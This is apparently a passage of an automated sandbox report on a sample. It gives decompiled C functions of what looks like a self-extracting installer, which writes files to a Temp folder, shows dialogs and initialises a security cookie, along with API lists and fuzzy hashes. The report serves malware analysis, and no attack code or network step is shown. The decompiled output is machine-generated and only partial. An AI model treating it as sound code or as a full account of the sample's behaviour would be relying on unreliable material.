                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: 4e517c43ce6f7d48518a77f851748d0153d2c265d4cb1a76c000d2fa8b98d7d9
                                                                                                                                                                                                        • Instruction ID: 56704204fb8811727fc14508aa3dda31274a9a2b7107d3fb63e90c93275c5f94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e517c43ce6f7d48518a77f851748d0153d2c265d4cb1a76c000d2fa8b98d7d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801D1B53002183BF32416694CA6F7B69CEDBD57D9F1440ADB746F22809FA8CE014179
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E00BC43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xbc9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00BC1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00BC1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00BC1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00BC1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: 25a1f6ba9bed675ed84763abea71754e7af84893696714001e72c96a7a836589
                                                                                                                                                                                                        • Instruction ID: a8a14160c4eb81534a4eff8f28f02c7ed4c0d07f1402b5cd5d4fc75d8562372e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25a1f6ba9bed675ed84763abea71754e7af84893696714001e72c96a7a836589
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD118E31501109AFDB10EF68DD08FAE77F8EB4A305F1085A8F926A3191DE309E01CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xbc8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xbc8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xbc8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BC7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00BC7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BC719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00BC71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00BC71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 7b064a88fa38505ccdd7639be15bcd4dba0b7698967cd3236f47c3d14a069d19
                                                                                                                                                                                                        • Instruction ID: d3f327a85898284bb602467f8a3e59d17e0914798dfc783f009b46e4d5fb1a80
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b064a88fa38505ccdd7639be15bcd4dba0b7698967cd3236f47c3d14a069d19
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2011F571D05208ABCB10DFB8DA58E9EB7F4EB5D315F6948AAE905E7210EF309A048B41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00BC63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E00BC1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        				E00BC658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0xbc9124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0xbc9124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC63EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-3290032183
                                                                                                                                                                                                        • Opcode ID: 8dafed93fbe42e0a06b5b148eed96ec8361084f876345551713b88f1bd6a37a7
                                                                                                                                                                                                        • Instruction ID: f3a450e7e0f5a63403c463d9afbd6fbef0f69e16c54be91f6eed0db8e4a0381d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dafed93fbe42e0a06b5b148eed96ec8361084f876345551713b88f1bd6a37a7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A421A2B1A0021CABDB14DF25DC8AFEB77A8EB59314F1041A9F585A3280DEB05D858FA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00BC1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xbc91e0; // 0x31d8ea8
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xbc91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        					E00BC44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        				E00BC44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00BC4E6F), ref: 00BC47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00BC4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00BC4847
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-3290032183
                                                                                                                                                                                                        • Opcode ID: 55303f5eb85f411912df1a218383323f9ce4063bb451091e4d40598c8a989079
                                                                                                                                                                                                        • Instruction ID: a189f0dd3142ef081598a0bdab61844557eb323e55551ff72b50b5967c72ba3a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55303f5eb85f411912df1a218383323f9ce4063bb451091e4d40598c8a989079
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E112575604641AFE7188F24AC68F733B9AEB8A300B18859DFA829B341DF758D068760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00BC369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00BC36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 36f1c86bb680f78dc6f2d73448d9b44d990ac5c93cb7f5de3526de3267cebd82
                                                                                                                                                                                                        • Instruction ID: 33a1df89de342452e7388824a27707a005555c8aa600aabe067f3723c014650c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36f1c86bb680f78dc6f2d73448d9b44d990ac5c93cb7f5de3526de3267cebd82
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C01847290421877DB304BA65C4CFEB77FCEB8AF14F44416DB915E2280DA608A40C6A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00BC6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xbc9a3c; // 0xbc0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E00BC44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00BC0000,000007D6,00000005), ref: 00BC652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00BC0000,00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00BC6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00BC0000,00000000,00000547,00BC19E0,00000000), ref: 00BC6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00BC6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: 660c2611cf49a81d0a63490b4aca357b358540138836221a3914f670ae1c96c8
                                                                                                                                                                                                        • Instruction ID: 7344ea7e25ae17aefdba0dcc33a41f439b214e22c4946f8deaa14c1afe5166cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 660c2611cf49a81d0a63490b4aca357b358540138836221a3914f670ae1c96c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B801F97250061DBBDB105F699C48EBB7BACEB99765F14016DFE10A3190DB71CD10C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00BC65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
